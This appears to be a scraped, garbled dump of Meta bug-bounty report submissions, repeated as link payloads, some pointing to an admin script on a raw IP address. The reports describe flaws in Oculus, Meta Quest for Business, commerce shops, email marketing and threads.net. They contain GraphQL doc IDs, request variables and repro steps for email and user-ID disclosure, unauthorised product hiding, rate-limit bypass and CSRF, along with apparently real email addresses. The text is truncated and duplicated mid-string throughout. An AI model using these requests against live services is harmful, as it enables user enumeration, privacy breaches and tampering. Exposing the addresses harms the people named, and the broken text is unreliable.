    {"input":{"client_mutation_id":"1","actor_id":"100033825612932","attachments_v2":[],"collaborators":[],"description":"Feature : "Release channels" let you distribute early versions of your builds to limited audiences for testing or other purposes. You can create public channels for users to subscribe to, or invite different groups of people to private release channels.

Read more here : https://developer.oculus.com/resources/publish-release-channels/

Bug : When we invite a user using email address, It returns UID of user in graphql request which shows pending invitation


NOTE : I reported similiar report months ago where "5302791553159678"  DOC ID were vuln. Meta fixed this issue by returning null in the field of UID, However, Now Team has made some changes and a new doc id(6942317155827346) is replaced which is vuln.

email to UID of meta/oculus user","fbdl_run_id":null,"funnel_session":"","incomplete_fix_of_id":null,"product_area":"1831817386847453","repro_steps":"1. Login into oculus account and navigate to developer.oculus.com/manage, Then
a)First create an Organization
b)Then create a New App


2. After creating App, navigate to MyApps->Select App which you have recently created->On left side panel click on Distribution->Release channels->Add new user using Email

3. After inviting victim into Channels, call graphql request which shows pending list of users


>GraphQL which shows pending user :

variables={"after":null,"first":20,"search_term":"","user_type":"PENDING_EMAIL_INVITE","id":"908202637214174"}  <br>6942317155827346


response : 

{"node":{"email":"sehalmittal1\u0040gmail.com","alias":"websitedonee","is_employee":false,"__typename":"XOCUserlistUser"}

here alias is username of supplied email","source":"COMET","subject":"inverse email address disclosure","vuln_type":"159350064619250","whitehat_private_bounty_type":null}}    <br>--------------------------------------------------</br>
        useWhitehatReportVulnerabilityFormCreateMutation <a target="_blank" href="https://www.facebook.com/sameer_rao_whitehat_testing/?doc_id=9008577672501420

*Response : In response it will return two IDs, You need to copy first one.

Attack : Get email address
=====

1)Open a new session and open this link after replace CID and UID 

https://work.meta.com/work/signin/magic_link/handle_login/?request_id=test&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%221%22%2C%22actor_id%22%3A%22100033825612932%22%2C%22attachments_v2%22%3A%5B%5D%2C%22collaborators%22%3A%5B%5D%2C%22description%22%3A%22Meta+is+working+on+new+product+called+Meta+quest+for+Business%2C+Which+is+similar+to+workplace.%0A%0AJust+like+Workplace+it+also+has+option+which+allows+users+to+login+into+account+using+%22magic+link%22%0A%0AMagic+link+%3A+It+is+an+option+which+allows+a+user+to+login+into+account+without+entering+password%2C+A+link+is+sent+to+email+address%2C+Using+link+a+user+can+login+into+it%2527s+account.%0A%0ABug+%3A+The+magic+link+is+leaking+email+address+of+supplied+UID%0A%0ADisclosure+of+email+address+of+Meta+quest+user%22%2C%22fbdl_run_id%22%3Anull%2C%22funnel_session%22%3A%22%22%2C%22incomplete_fix_of_id%22%3Anull%2C%22product_area%22%3A%22505721206438001%22%2C%22repro_steps%22%3A%22%2AIn+order+to+perform+this+attack%2C+Malicious+user+needs+two+things+1%29CID%28company+ID%29+2%29UID+of+victim%0A%0ACreate+Meta+Quest+Business+and+Fetch+CID+and+UID%0A%3D%3D%3D%3D%3D%0A%0A1%29+Navigate+to+https%3A%2F%2Fwww.meta.com%2Fwork%2Fquest-for-business%2Fgetting-started%2F%0A2%29Click+on+Signup+for+Beta%2C+And+create+an+account+%28use+business+email%2C+Temp+mails+might+not+work%29%0A3%29After+successful+creation+of+Business+account%2C+Fetch+UID+from+cookie+%28cookie+name+c_user%29+and+call+this+graphql+query+to+get+CID.%0A%0Avariables%3D%7B%7D">run </a>
<a target="_blank" href="http://157.230.179.11/admin/catfbdl.php?doc_id=9008577672501420

*Response : In response it will return two IDs, You need to copy first one.

Attack : Get email address
=====

1)Open a new session and open this link after replace CID and UID 

https://work.meta.com/work/signin/magic_link/handle_login/?request_id=test&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%221%22%2C%22actor_id%22%3A%22100033825612932%22%2C%22attachments_v2%22%3A%5B%5D%2C%22collaborators%22%3A%5B%5D%2C%22description%22%3A%22Meta+is+working+on+new+product+called+Meta+quest+for+Business%2C+Which+is+similar+to+workplace.%0A%0AJust+like+Workplace+it+also+has+option+which+allows+users+to+login+into+account+using+%22magic+link%22%0A%0AMagic+link+%3A+It+is+an+option+which+allows+a+user+to+login+into+account+without+entering+password%2C+A+link+is+sent+to+email+address%2C+Using+link+a+user+can+login+into+it%2527s+account.%0A%0ABug+%3A+The+magic+link+is+leaking+email+address+of+supplied+UID%0A%0ADisclosure+of+email+address+of+Meta+quest+user%22%2C%22fbdl_run_id%22%3Anull%2C%22funnel_session%22%3A%22%22%2C%22incomplete_fix_of_id%22%3Anull%2C%22product_area%22%3A%22505721206438001%22%2C%22repro_steps%22%3A%22%2AIn+order+to+perform+this+attack%2C+Malicious+user+needs+two+things+1%29CID%28company+ID%29+2%29UID+of+victim%0A%0ACreate+Meta+Quest+Business+and+Fetch+CID+and+UID%0A%3D%3D%3D%3D%3D%0A%0A1%29+Navigate+to+https%3A%2F%2Fwww.meta.com%2Fwork%2Fquest-for-business%2Fgetting-started%2F%0A2%29Click+on+Signup+for+Beta%2C+And+create+an+account+%28use+business+email%2C+Temp+mails+might+not+work%29%0A3%29After+successful+creation+of+Business+account%2C+Fetch+UID+from+cookie+%28cookie+name+c_user%29+and+call+this+graphql+query+to+get+CID.%0A%0Avariables%3D%7B%7D">FBDL </a>
    <br>
    {"input":{"client_mutation_id":"1","actor_id":"100033825612932","attachments_v2":[],"collaborators":[],"description":"Meta is working on new product called Meta quest for Business, Which is similar to workplace.

Just like Workplace it also has option which allows users to login into account using "magic link"

Magic link : It is an option which allows a user to login into account without entering password, A link is sent to email address, Using link a user can login into it%27s account.

Bug : The magic link is leaking email address of supplied UID

Disclosure of email address of Meta quest user","fbdl_run_id":null,"funnel_session":"","incomplete_fix_of_id":null,"product_area":"505721206438001","repro_steps":"*In order to perform this attack, Malicious user needs two things 1)CID(company ID) 2)UID of victim

Create Meta Quest Business and Fetch CID and UID
=====

1) Navigate to https://www.meta.com/work/quest-for-business/getting-started/
2)Click on Signup for Beta, And create an account (use business email, Temp mails might not work)
3)After successful creation of Business account, Fetch UID from cookie (cookie name c_user) and call this graphql query to get CID.

variables={}  <br>9008577672501420

*Response : In response it will return two IDs, You need to copy first one.

Attack : Get email address
=====

1)Open a new session and open this link after replace CID and UID 

https://work.meta.com/work/signin/magic_link/handle_login/?request_id=test    <br>--------------------------------------------------</br>
        useWhitehatReportVulnerabilityFormCreateMutation <a target="_blank" href="https://www.facebook.com/sameer_rao_whitehat_testing/?doc_id=5438618626157670

5. We can see the profile picture and public details of userid fetched from above URL by navigating to https://www.oculus.com/deeplink/?action=view&variables=%7B%22email%22%3A%22oculus1%40npsonlinebook.in%22%7D">run </a>
<a target="_blank" href="http://157.230.179.11/admin/catfbdl.php?doc_id=5438618626157670

5. We can see the profile picture and public details of userid fetched from above URL by navigating to https://www.oculus.com/deeplink/?action=view&variables=%7B%22email%22%3A%22oculus1%40npsonlinebook.in%22%7D">FBDL </a>
    <br>
    {"email":"oculus1@npsonlinebook.in"}  <br>5438618626157670

5. We can see the profile picture and public details of userid fetched from above URL by navigating to https://www.oculus.com/deeplink/?action=view    <br>--------------------------------------------------</br>
        useWhitehatReportVulnerabilityFormCreateMutation <a target="_blank" href="https://www.facebook.com/sameer_rao_whitehat_testing/?doc_id=4406236179392688

In response It will return "MiniShopStorefront" Copy that ID.

c)Now final request which makes the product hide/unhide : 


doc_id=5078615608934465&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%222%22%2C%22actor_id%22%3A%221010101%22%2C%22product_group_id%22%3A%226943000632408441%22%2C%22shop_id%22%3A%223632794253406075%22%2C%22visibility_update_action%22%3A%22HIDE_AND_REMOVE%22%7D%2C%22inventoryType%22%3Anull%2C%22shopID%22%3A%223632794253406075%22%7D%0A%0AIn+response+It+should+not+return+any+error.%0A%0AChange+the+value+of+visibility_update_action+to+UNHIDE_AND_ADD+to+add+a+product.%22%2C%22source%22%3A%22COMET%22%2C%22subject%22%3A%22Any+user+can+hide%2Fadd+product+in+commerce+shop%22%2C%22vuln_type%22%3A%22274084149744118%22%2C%22whitehat_private_bounty_type%22%3Anull%7D%7D">run </a>
<a target="_blank" href="http://157.230.179.11/admin/catfbdl.php?doc_id=4406236179392688

In response It will return "MiniShopStorefront" Copy that ID.

c)Now final request which makes the product hide/unhide : 


doc_id=5078615608934465&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%222%22%2C%22actor_id%22%3A%221010101%22%2C%22product_group_id%22%3A%226943000632408441%22%2C%22shop_id%22%3A%223632794253406075%22%2C%22visibility_update_action%22%3A%22HIDE_AND_REMOVE%22%7D%2C%22inventoryType%22%3Anull%2C%22shopID%22%3A%223632794253406075%22%7D%0A%0AIn+response+It+should+not+return+any+error.%0A%0AChange+the+value+of+visibility_update_action+to+UNHIDE_AND_ADD+to+add+a+product.%22%2C%22source%22%3A%22COMET%22%2C%22subject%22%3A%22Any+user+can+hide%2Fadd+product+in+commerce+shop%22%2C%22vuln_type%22%3A%22274084149744118%22%2C%22whitehat_private_bounty_type%22%3Anull%7D%7D">FBDL </a>
    <br>
    {"input":{"client_mutation_id":"2","actor_id":"1010101","product_group_id":"6943000632408441","shop_id":"3632794253406075","visibility_update_action":"HIDE_AND_REMOVE"},"inventoryType":null,"shopID":"3632794253406075"}

In response It should not return any error.

Change the value of visibility_update_action to UNHIDE_AND_ADD to add a product.","source":"COMET","subject":"Any user can hide/add product in commerce shop","vuln_type":"274084149744118","whitehat_private_bounty_type":null}}  <br>4406236179392688

In response It will return "MiniShopStorefront" Copy that ID.

c)Now final request which makes the product hide/unhide : 


doc_id=5078615608934465    <br>--------------------------------------------------</br>
        useWhitehatReportVulnerabilityFormCreateMutation <a target="_blank" href="https://www.facebook.com/sameer_rao_whitehat_testing/?doc_id=3942272735851468&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%221%22%2C%22actor_id%22%3A%22100033825612932%22%2C%22attachments_v2%22%3A%5B%7B%22handle%22%3A%223%3AU2NyZWVuc2hvdCUyMDIwMjItMDctMDYlMjBhdCUyMDMuMDkuNTAlMjBBTS5wbmc%3D%3AaW1hZ2UvcG5n%3AARYkl4XdeSzfo2ASpmMr7wihB55hHovE7z7ek8VPIeL_b9w86XqQAK8Hg4pzOayVB76xNXqhIiXlplrcx4X94JSoau7bWvIjTIBLNUY7MsJs2w%3Ae%3A1657402834%3AARb0Xg2bnSRoH7JTM3E%22%2C%22name%22%3A%22Screenshot+2022-07-06+at+3.09.50+AM.png%22%7D%5D%2C%22collaborators%22%3A%5B%5D%2C%22description%22%3A%22Marketplace+%28+https%3A%2F%2Fwww.facebook.com%2Fmarketplace%2F+%29+%3A+It+is+a+feature+which+allows+user+to+sell%2Fbuy+products+on+Facebook.%0A%0AIf+a+user+violates+marketplace+policy+user+gets+banned+from+accessing+marketplace.%0A%0AFacebook+Groups+%3A+There+are+different+sub+sets+can+be+added+to+FB+groups%2C+One+of+them+is+buy">run </a>
<a target="_blank" href="http://157.230.179.11/admin/catfbdl.php?doc_id=3942272735851468&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%221%22%2C%22actor_id%22%3A%22100033825612932%22%2C%22attachments_v2%22%3A%5B%7B%22handle%22%3A%223%3AU2NyZWVuc2hvdCUyMDIwMjItMDctMDYlMjBhdCUyMDMuMDkuNTAlMjBBTS5wbmc%3D%3AaW1hZ2UvcG5n%3AARYkl4XdeSzfo2ASpmMr7wihB55hHovE7z7ek8VPIeL_b9w86XqQAK8Hg4pzOayVB76xNXqhIiXlplrcx4X94JSoau7bWvIjTIBLNUY7MsJs2w%3Ae%3A1657402834%3AARb0Xg2bnSRoH7JTM3E%22%2C%22name%22%3A%22Screenshot+2022-07-06+at+3.09.50+AM.png%22%7D%5D%2C%22collaborators%22%3A%5B%5D%2C%22description%22%3A%22Marketplace+%28+https%3A%2F%2Fwww.facebook.com%2Fmarketplace%2F+%29+%3A+It+is+a+feature+which+allows+user+to+sell%2Fbuy+products+on+Facebook.%0A%0AIf+a+user+violates+marketplace+policy+user+gets+banned+from+accessing+marketplace.%0A%0AFacebook+Groups+%3A+There+are+different+sub+sets+can+be+added+to+FB+groups%2C+One+of+them+is+buy">FBDL </a>
    <br>
    {"input":{"client_mutation_id":"1","actor_id":"100033825612932","attachments_v2":[{"handle":"3:U2NyZWVuc2hvdCUyMDIwMjItMDctMDYlMjBhdCUyMDMuMDkuNTAlMjBBTS5wbmc=:aW1hZ2UvcG5n:ARYkl4XdeSzfo2ASpmMr7wihB55hHovE7z7ek8VPIeL_b9w86XqQAK8Hg4pzOayVB76xNXqhIiXlplrcx4X94JSoau7bWvIjTIBLNUY7MsJs2w:e:1657402834:ARb0Xg2bnSRoH7JTM3E","name":"Screenshot 2022-07-06 at 3.09.50 AM.png"}],"collaborators":[],"description":"Marketplace ( https://www.facebook.com/marketplace/ ) : It is a feature which allows user to sell/buy products on Facebook.

If a user violates marketplace policy user gets banned from accessing marketplace.

Facebook Groups : There are different sub sets can be added to FB groups, One of them is buy  <br>3942272735851468    <br>--------------------------------------------------</br>
        useWhitehatReportVulnerabilityFormCreateMutation <a target="_blank" href="https://www.facebook.com/sameer_rao_whitehat_testing/?doc_id=4773726995992800

This is vulnerable and lacking the proper rate limit.

Thanks","source":"COMET","subject":"Missing rate limit while verifing sender email on email marketing","vuln_type":"817832495042950","whitehat_private_bounty_type":null}}&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%221%22%2C%22actor_id%22%3A%22100033825612932%22%2C%22attachments_v2%22%3A%5B%5D%2C%22collaborators%22%3A%5B%5D%2C%22description%22%3A%22Facebook+is+working+on+a+new+product+where+page+admins+can+send+marketing+messages+to+subscribers.%0A%0AAdmin+can+customized+email+by+its+preferences%2C+It+also+allows+Admin+to+add+%22Sender+Email%22%2C+Admin+can+have+more+than+one+Sender+Email%2C+The+sender+email+needs+to+be+verified+first.%0A%0AEmail+marketing+feature+comes+under+%22Leads+Center%22+feature.%0A%0ABUG+%3A+The+graphql+mutation+which+verify+5+digits+code+is+not+rate+limited.%0A%0AA+malicious+page+admin+can+send+marketing+messages+on+behalf+of+any+email+address.%22%2C%22fbdl_run_id%22%3Anull%2C%22funnel_session%22%3A%22%22%2C%22incomplete_fix_of_id%22%3Anull%2C%22product_area%22%3A%22803196579846402%22%2C%22repro_steps%22%3A%22Users%3A+UserOne%0A%0AEnvironment%3A+UserOne+is+Admin+of+PageOne+%0A%0ABrowser%3A+n%2Fa%0A%0AOS%3A+n%2Fa%0A%0A1.+This+is+new+feature+in+%22leads+center%22+called+email+marketing%2C+You+can+access+it+by+going+https%3A%2F%2Fbusiness.facebook.com%2Flatest%2Femail_marketing%3Fasset_id%3D%3Cpage_id%3E">run </a>
<a target="_blank" href="http://157.230.179.11/admin/catfbdl.php?doc_id=4773726995992800

This is vulnerable and lacking the proper rate limit.

Thanks","source":"COMET","subject":"Missing rate limit while verifing sender email on email marketing","vuln_type":"817832495042950","whitehat_private_bounty_type":null}}&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%221%22%2C%22actor_id%22%3A%22100033825612932%22%2C%22attachments_v2%22%3A%5B%5D%2C%22collaborators%22%3A%5B%5D%2C%22description%22%3A%22Facebook+is+working+on+a+new+product+where+page+admins+can+send+marketing+messages+to+subscribers.%0A%0AAdmin+can+customized+email+by+its+preferences%2C+It+also+allows+Admin+to+add+%22Sender+Email%22%2C+Admin+can+have+more+than+one+Sender+Email%2C+The+sender+email+needs+to+be+verified+first.%0A%0AEmail+marketing+feature+comes+under+%22Leads+Center%22+feature.%0A%0ABUG+%3A+The+graphql+mutation+which+verify+5+digits+code+is+not+rate+limited.%0A%0AA+malicious+page+admin+can+send+marketing+messages+on+behalf+of+any+email+address.%22%2C%22fbdl_run_id%22%3Anull%2C%22funnel_session%22%3A%22%22%2C%22incomplete_fix_of_id%22%3Anull%2C%22product_area%22%3A%22803196579846402%22%2C%22repro_steps%22%3A%22Users%3A+UserOne%0A%0AEnvironment%3A+UserOne+is+Admin+of+PageOne+%0A%0ABrowser%3A+n%2Fa%0A%0AOS%3A+n%2Fa%0A%0A1.+This+is+new+feature+in+%22leads+center%22+called+email+marketing%2C+You+can+access+it+by+going+https%3A%2F%2Fbusiness.facebook.com%2Flatest%2Femail_marketing%3Fasset_id%3D%3Cpage_id%3E">FBDL </a>
    <br>
    {"input":{"client_mutation_id":"1","actor_id":"100033825612932","attachments_v2":[],"collaborators":[],"description":"Facebook is working on a new product where page admins can send marketing messages to subscribers.

Admin can customized email by its preferences, It also allows Admin to add "Sender Email", Admin can have more than one Sender Email, The sender email needs to be verified first.

Email marketing feature comes under "Leads Center" feature.

BUG : The graphql mutation which verify 5 digits code is not rate limited.

A malicious page admin can send marketing messages on behalf of any email address.","fbdl_run_id":null,"funnel_session":"","incomplete_fix_of_id":null,"product_area":"803196579846402","repro_steps":"Users: UserOne

Environment: UserOne is Admin of PageOne 

Browser: n/a

OS: n/a

1. This is new feature in "leads center" called email marketing, You can access it by going https://business.facebook.com/latest/email_marketing?asset_id=<page_id>  <br>4773726995992800

This is vulnerable and lacking the proper rate limit.

Thanks","source":"COMET","subject":"Missing rate limit while verifing sender email on email marketing","vuln_type":"817832495042950","whitehat_private_bounty_type":null}}    <br>--------------------------------------------------</br>
        useWhitehatReportVulnerabilityFormCreateMutation <a target="_blank" href="https://www.facebook.com/sameer_rao_whitehat_testing/?doc_id=3186340558047774

It will return profile picture of supplied user.

PS : I am able to request around ~10k before getting rate limited, the safe limit should be around ~200.","source":"COMET","subject":"Doc_id 3186340558047774 is not properly rate limited","vuln_type":"817832495042950","whitehat_private_bounty_type":"395677605577613"}}&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%221%22%2C%22actor_id%22%3A%22100004933711303%22%2C%22attachments_v2%22%3A%5B%5D%2C%22collaborators%22%3A%5B%5D%2C%22description%22%3A%22There+is+a+graphql+query+which+returns+profile+picture+of+supplied+user%2C+The+query+has+no+protection+against+scrapping.%0A%0Ascrape+profile+picture+in+scale%22%2C%22fbdl_run_id%22%3Anull%2C%22funnel_session%22%3A%22%22%2C%22incomplete_fix_of_id%22%3Anull%2C%22product_area%22%3A%22476930452665646%22%2C%22repro_steps%22%3A%221.+run+this+graphql+query+with+different+UID+everytime+%3A%0A%0Avariables%3D%7B%22videoID%22%3A%22%3CVIDEO_ID%3E%22%2C%22userID%22%3A%22%3CUID%3E%22%7D">run </a>
<a target="_blank" href="http://157.230.179.11/admin/catfbdl.php?doc_id=3186340558047774

It will return profile picture of supplied user.

PS : I am able to request around ~10k before getting rate limited, the safe limit should be around ~200.","source":"COMET","subject":"Doc_id 3186340558047774 is not properly rate limited","vuln_type":"817832495042950","whitehat_private_bounty_type":"395677605577613"}}&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%221%22%2C%22actor_id%22%3A%22100004933711303%22%2C%22attachments_v2%22%3A%5B%5D%2C%22collaborators%22%3A%5B%5D%2C%22description%22%3A%22There+is+a+graphql+query+which+returns+profile+picture+of+supplied+user%2C+The+query+has+no+protection+against+scrapping.%0A%0Ascrape+profile+picture+in+scale%22%2C%22fbdl_run_id%22%3Anull%2C%22funnel_session%22%3A%22%22%2C%22incomplete_fix_of_id%22%3Anull%2C%22product_area%22%3A%22476930452665646%22%2C%22repro_steps%22%3A%221.+run+this+graphql+query+with+different+UID+everytime+%3A%0A%0Avariables%3D%7B%22videoID%22%3A%22%3CVIDEO_ID%3E%22%2C%22userID%22%3A%22%3CUID%3E%22%7D">FBDL </a>
    <br>
    {"input":{"client_mutation_id":"1","actor_id":"100004933711303","attachments_v2":[],"collaborators":[],"description":"There is a graphql query which returns profile picture of supplied user, The query has no protection against scrapping.

scrape profile picture in scale","fbdl_run_id":null,"funnel_session":"","incomplete_fix_of_id":null,"product_area":"476930452665646","repro_steps":"1. run this graphql query with different UID everytime :

variables={"videoID":"<VIDEO_ID>","userID":"<UID>"}  <br>3186340558047774

It will return profile picture of supplied user.

PS : I am able to request around ~10k before getting rate limited, the safe limit should be around ~200.","source":"COMET","subject":"Doc_id 3186340558047774 is not properly rate limited","vuln_type":"817832495042950","whitehat_private_bounty_type":"395677605577613"}}    <br>--------------------------------------------------</br>
    9402602493202387,4970913202987411,7482680791844416,25858811387100015,8108975709165912


click on above link, it will change basic details of account, including making private account to public","source":"COMET","subject":"[threads.net] - No csrf protection","vuln_type":"309076739565597","whitehat_private_bounty_type":null}},26534466229485935,7595436947177368,25472786462365728

replace values and done, It will send collab request to victim without having valid code of victim, we can send multiple invitaitons too","source":"COMET","subject":"[Work Meta] Invite any organization/company for external relationship without having "relationship ID"","vuln_type":"159350064619250","whitehat_private_bounty_type":null}},24595242403452990,5566956313411189,6976127939112262,6942317155827346


response : 

{"node":{"email":"sehalmittal1\u0040gmail.com","alias":"websitedonee","is_employee":false,"__typename":"XOCUserlistUser"}

here alias is username of supplied email","source":"COMET","subject":"inverse email address disclosure","vuln_type":"159350064619250","whitehat_private_bounty_type":null}},9008577672501420

*Response : In response it will return two IDs, You need to copy first one.

Attack : Get email address
=====

1)Open a new session and open this link after replace CID and UID 

https://work.meta.com/work/signin/magic_link/handle_login/?request_id=test,5438618626157670

5. We can see the profile picture and public details of userid fetched from above URL by navigating to https://www.oculus.com/deeplink/?action=view,4406236179392688

In response It will return "MiniShopStorefront" Copy that ID.

c)Now final request which makes the product hide/unhide : 


doc_id=5078615608934465,3942272735851468,4773726995992800

This is vulnerable and lacking the proper rate limit.

Thanks","source":"COMET","subject":"Missing rate limit while verifing sender email on email marketing","vuln_type":"817832495042950","whitehat_private_bounty_type":null}},3186340558047774

It will return profile picture of supplied user.

PS : I am able to request around ~10k before getting rate limited, the safe limit should be around ~200.","source":"COMET","subject":"Doc_id 3186340558047774 is not properly rate limited","vuln_type":"817832495042950","whitehat_private_bounty_type":"395677605577613"}}<br>,4970913202987411,9402602493202387